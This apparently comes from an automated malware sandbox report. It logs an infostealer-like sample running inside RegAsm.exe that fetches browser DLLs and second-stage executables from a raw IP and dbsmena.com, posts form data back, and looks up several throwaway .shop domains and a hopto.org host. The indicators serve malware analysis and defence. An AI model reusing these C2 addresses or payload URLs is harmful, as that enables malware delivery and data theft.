Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ljhgfsd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vdshfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: dbsmena.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.co2 equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: dbsmena.com
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Http://cowod.hopto.org/form-data;
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.AKJKJEBGCAK
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.AKJKJEVWXYZ1234567890isposition:
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.EBGCAK
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgKJKJE--67890isposition:
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgKJKJEontent-Disposition:
Source: file.exe, 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoIEBGCAK
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000003.00000002.2402065082.00000000206CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427231570.000000003E3F6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2420431696.000000003251D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2412916787.0000000026633000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2393955360.000000001A2FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2401743748.000000002029D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.13.dr	String found in binary or memory: https://5.75.211.162
Source: RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000134C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/
Source: RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/75.211.162
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/D
Source: RegAsm.exe, 0000000D.00000002.2704852578.000000000121A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/HJEBKJEGH
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dllrDH
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dllD
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll0G
Source: RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dll.G
Source: RegAsm.exe, 0000000D.00000002.2702734950.000000000055E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllI
Source: RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllJ
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dll
Source: RegAsm.exe, 0000000D.00000002.2702734950.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.1620.5938.132
